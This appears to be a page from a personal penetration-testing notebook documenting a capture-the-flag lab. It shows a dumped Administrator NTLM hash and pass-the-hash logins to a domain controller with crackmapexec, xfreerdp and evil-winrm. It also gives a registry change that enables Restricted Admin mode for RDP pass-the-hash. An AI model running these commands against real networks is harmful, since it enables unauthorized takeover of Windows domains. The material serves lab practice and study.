LOOT

 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f6aaf1438d78c89c4636179e3ae18ea:::
aad3b435b51404eeaad3b435b51404ee:8f6aaf1438d78c89c4636179e3ae18ea

Getting the Flag

 
└─$ crackmapexec smb 172.16.1.200 -u 'Administrator' -H 8f6aaf1438d78c89c4636179e3ae18ea
SMB         172.16.1.200    445    DC0              [*] Windows 10.0 Build 17763 x64 (name:DC0) (domain:LAB.OFFSHORE.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.1.200    445    DC0              [+] LAB.OFFSHORE.LOCAL\Administrator:8f6aaf1438d78c89c4636179e3ae18ea (Pwn3d!)

Logging in

 
└─$ xfreerdp /u:Administrator /v:172.16.1.200 /pth:8f6aaf1438d78c89c4636179e3ae18ea /d:lab.offshore.local

Removing Admin Restrictions

Logging in using evilwinrm

evil-winrm -i 172.16.1.200 -u 'Administrator' -H 8f6aaf1438d78c89c4636179e3ae18ea  /domain:lab.offshore.local

Removing Admin Restricitons

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Malleum Knowledge Base

Explorer

LOOT

Getting the Flag

Logging in

Removing Admin Restrictions

Logging in using evilwinrm

Removing Admin Restricitons

Graph View

Table of Contents